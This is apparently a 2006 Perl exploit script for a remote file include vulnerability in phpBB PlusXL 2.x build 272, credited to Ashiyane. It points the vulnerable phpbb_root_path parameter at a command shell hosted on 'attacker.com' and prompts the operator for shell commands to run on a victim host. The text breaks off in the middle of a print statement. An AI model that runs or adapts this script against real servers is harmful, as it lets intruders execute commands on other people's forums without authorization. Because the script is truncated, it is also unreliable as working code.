| 
 | 
#!/usr/bin/perl
 
#####################################################################################################
#                                                                                                   #
# phpBB PlusXL 2.X biuld 272                                                                        #
#                                                                                                   #
# Class:  Remote File Include Vulnerability                                                         #
#                                                                                                   #
# Patch:  unavailable                                                                               #
#                                                                                                   #
# Date:   2006/10/12                                                                                #
#                                                                                                   #
# Remote: Yes                                                                                       #
#                                                                                                   #
# Type:   high                                                                                      #
#                                                                                                   #
# Site: http://www.xs4all.nl/~hkicken/plusxl.htm # 
#                                                                                                   #
#####################################################################################################
use IO::Socket;
use LWP::Simple;
$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script 
print "\n";
print "##########################################################################\n";
print "#                                                                        #\n";
print "# phpBB PlusXL 2.x <= biuld 272    Remote File Include Vulnerability     #\n";
print "# Bug found By : Ashiyane Corporation                                    #\n";
print "# Email: nima salehi    nima[at]ashiyane.ir                              #\n";
print "# Web Site : www.Ashiyane.ir #\n"; 
print "#                                                                        #\n";
print "##########################################################################\n";
if (@ARGV < 2)
{
    print "\n Usage: Ashiyane.pl [host] [path] ";
print "\n EX : Ashiyane.pl www.victim.com /plusxl20/ \n\n"; 
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vul="mods/iai/includes/constants.php?phpbb_root_path="
print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";
print "